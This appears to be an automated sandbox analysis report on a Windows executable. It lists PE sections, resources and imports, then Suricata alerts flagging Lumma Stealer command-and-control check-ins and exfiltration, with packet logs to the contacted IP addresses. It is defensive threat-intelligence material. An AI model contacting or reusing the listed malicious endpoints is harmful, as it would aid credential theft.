                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x12f0000x295e.idata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x14f0000xb8000.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1ae2000x2118.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1340000x1a13c.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x1330000x18.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                CODE0x10000x1275fc0x12760027895dc7cfed60c02965a018dea8e393False0.45191989790520526data6.565736518746283IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                DATA0x1290000x36c00x3800f15602958cfed3b9c1fa839de845894eFalse0.35498046875data4.044626185990053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                BSS0x12d0000x1d210x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .idata0x12f0000x295e0x2a007d48f980de0ab1b669d230f1aad47239False0.3625372023809524data5.0281993778896545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .tls0x1320000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .rdata0x1330000x180x200b90be1293225713fd61560e123c5aa47False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "S"0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .reloc0x1340000x1a13c0x1a200c839772e1a25c7cda4d2220521452f23False0.39902624102870815data6.531022351368505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0x14f0000xb80000xb800069373147e9c6f8f4d0346c863698e9a8False0.5736163595448369data7.41063875303202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_CURSOR0x14fe4c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                                                                                                RT_CURSOR0x14ff800x134data0.4642857142857143
                                                                                                                                                                                                                                RT_CURSOR0x1500b40x134data0.4805194805194805
                                                                                                                                                                                                                                RT_CURSOR0x1501e80x134data0.38311688311688313
                                                                                                                                                                                                                                RT_CURSOR0x15031c0x134data0.36038961038961037
                                                                                                                                                                                                                                RT_CURSOR0x1504500x134data0.4090909090909091
                                                                                                                                                                                                                                RT_CURSOR0x1505840x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                                                                                                RT_BITMAP0x1506b80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                                                                                                RT_BITMAP0x1508880x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                                                                                                                                RT_BITMAP0x150a6c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                                                                                                RT_BITMAP0x150c3c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                                                                                                                                RT_BITMAP0x150e0c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                                                                                                                                RT_BITMAP0x150fdc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                                                                                                                                RT_BITMAP0x1511ac0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                                                                                                                                RT_BITMAP0x15137c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                                                                                                RT_BITMAP0x15154c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                                                                                                                                RT_BITMAP0x15171c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                                                                                                RT_BITMAP0x1518ec0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                                                                                                                RT_ICON0x1519d40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0ChineseChina0.2980894357033006
                                                                                                                                                                                                                                RT_ICON0x1621fc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0ChineseChina0.43776570618800187
                                                                                                                                                                                                                                RT_ICON0x1664240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0ChineseChina0.5142116182572614
                                                                                                                                                                                                                                RT_ICON0x1689cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0ChineseChina0.5811444652908068
                                                                                                                                                                                                                                RT_ICON0x169a740x988Device independent bitmap graphic, 24 x 48 x 32, image size 0ChineseChina0.6598360655737705
                                                                                                                                                                                                                                RT_ICON0x16a3fc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0ChineseChina0.749113475177305
                                                                                                                                                                                                                                RT_DIALOG0x16a8640x52data0.7682926829268293
                                                                                                                                                                                                                                RT_STRING0x16a8b80xe4data0.5789473684210527
                                                                                                                                                                                                                                RT_STRING0x16a99c0x1e4data0.38016528925619836
                                                                                                                                                                                                                                RT_STRING0x16ab800x1a4data0.4714285714285714
                                                                                                                                                                                                                                RT_STRING0x16ad240x11cdata0.5880281690140845
                                                                                                                                                                                                                                RT_STRING0x16ae400x38cdata0.4251101321585903
                                                                                                                                                                                                                                RT_STRING0x16b1cc0xc4data0.6071428571428571
                                                                                                                                                                                                                                RT_STRING0x16b2900xecdata0.597457627118644
                                                                                                                                                                                                                                RT_STRING0x16b37c0x130data0.5625
                                                                                                                                                                                                                                RT_STRING0x16b4ac0x3c0data0.4
                                                                                                                                                                                                                                RT_STRING0x16b86c0x400data0.3876953125
                                                                                                                                                                                                                                RT_STRING0x16bc6c0x314data0.4022842639593909
                                                                                                                                                                                                                                RT_STRING0x16bf800x334data0.3426829268292683
                                                                                                                                                                                                                                RT_STRING0x16c2b40x404data0.3754863813229572
                                                                                                                                                                                                                                RT_STRING0x16c6b80x114data0.5
                                                                                                                                                                                                                                RT_STRING0x16c7cc0xe4data0.5482456140350878
                                                                                                                                                                                                                                RT_STRING0x16c8b00x24cdata0.477891156462585
                                                                                                                                                                                                                                RT_STRING0x16cafc0x3ccdata0.30246913580246915
                                                                                                                                                                                                                                RT_STRING0x16cec80x3acdata0.37553191489361704
                                                                                                                                                                                                                                RT_STRING0x16d2740x2d4data0.4046961325966851
                                                                                                                                                                                                                                RT_RCDATA0x16d5480x242bfDelphi compiled form 'TvgBackground'EnglishUnited States0.2749883571028422
                                                                                                                                                                                                                                RT_RCDATA0x1918080x10data1.5
                                                                                                                                                                                                                                RT_RCDATA0x1918180x670data0.6037621359223301
                                                                                                                                                                                                                                RT_RCDATA0x191e880xa2aDelphi compiled form 'TfrmAbout'0.23904688700999233
                                                                                                                                                                                                                                RT_RCDATA0x1928b40x817Delphi compiled form 'TfrmControlBox'0.3896668276195075
                                                                                                                                                                                                                                RT_RCDATA0x1930cc0x1ce81Delphi compiled form 'TfrmPlayer'0.9742231906825112
                                                                                                                                                                                                                                RT_RCDATA0x1aff500x1809Delphi compiled form 'TvgBitmapEditor'0.3528360149520559
                                                                                                                                                                                                                                RT_RCDATA0x1b175c0x3144Delphi compiled form 'TvgBrushDesign'0.20480494766888677
                                                                                                                                                                                                                                RT_RCDATA0x1b48a00x80eDelphi compiled form 'TvgPathDataDesigner'0.4010669253152279
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b50b00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b50c40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b50d80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b50ec0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b51000x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b51140x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                                RT_GROUP_CURSOR0x1b51280x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                                RT_GROUP_ICON0x1b513c0x5adataChineseChina0.7888888888888889
                                                                                                                                                                                                                                RT_MANIFEST0x1b51980x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                                                                                                user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SystemTimeToFileTime, Sleep, SizeofResource, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEnvironmentVariableW, SetEnvironmentVariableA, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, ReleaseMutex, ReadFile, OutputDebugStringA, MulDiv, LockResource, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameW, GetFullPathNameA, GetFileSize, GetFileAttributesW, GetFileAttributesA, GetExitCodeThread, GetEnvironmentVariableW, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentDirectoryW, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileW, FindFirstFileW, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateMutexA, CreateFileW, CreateFileA, CreateEventA, CompareStringW, CompareStringA, CloseHandle
                                                                                                                                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
                                                                                                                                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, SendDlgItemMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRgn, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharLowerBuffW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                                kernel32.dllSleep
                                                                                                                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                                ole32.dllReleaseStgMedium, RevokeDragDrop, RegisterDragDrop, OleInitialize, CoCreateInstance
                                                                                                                                                                                                                                comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                                imm32.dllImmSetCompositionWindow, ImmSetCompositionFontA, ImmGetCompositionStringW, ImmReleaseContext, ImmGetContext
                                                                                                                                                                                                                                winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                                                                                                                                                                                                                                shell32.dllDragQueryFileW, DragQueryFileA
                                                                                                                                                                                                                                comdlg32.dllChooseFontA, ChooseColorA, GetSaveFileNameA, GetOpenFileNameA

                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                ChineseChina
                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-12-30T19:10:12.312033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:12.801798+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:12.801798+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:13.288627+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:13.761440+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:13.761440+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:14.567126+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:15.816311+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:17.287015+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:20.610274+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:21.064381+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:21.807662+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:25.849669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:28.623498+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:29.102995+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744104.21.32.1443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:29.906966+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745185.161.251.21443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:30.691182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746172.67.208.58443TCP
                                                                                                                                                                                                                                2024-12-30T19:10:31.106563+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.208.58443192.168.2.449746TCP

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.845666885 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.845700979 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.845913887 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.848824978 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.848839045 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.311925888 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.312032938 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.317002058 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.317008972 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.317297935 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.365329027 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.393132925 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.393167019 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.393265009 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.801805019 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.801899910 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.801949978 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.823225021 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.823241949 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.832113028 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.832149029 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.832211971 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.832770109 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:12.832784891 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.288552046 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.288626909 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.290321112 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.290333033 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.290564060 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.292128086 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.292145014 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.292187929 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761439085 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761482954 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761507034 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761531115 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761539936 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761558056 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761584997 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761900902 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761929035 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761941910 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761945963 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761982918 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.761987925 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.766043901 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.766073942 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.766083956 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.766088963 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.766135931 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.766139984 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.818459034 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.847996950 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.848092079 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.848113060 CET44349731104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.848141909 CET49731443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:13.848148108 CET44349731104.21.32.1192.168.2.4
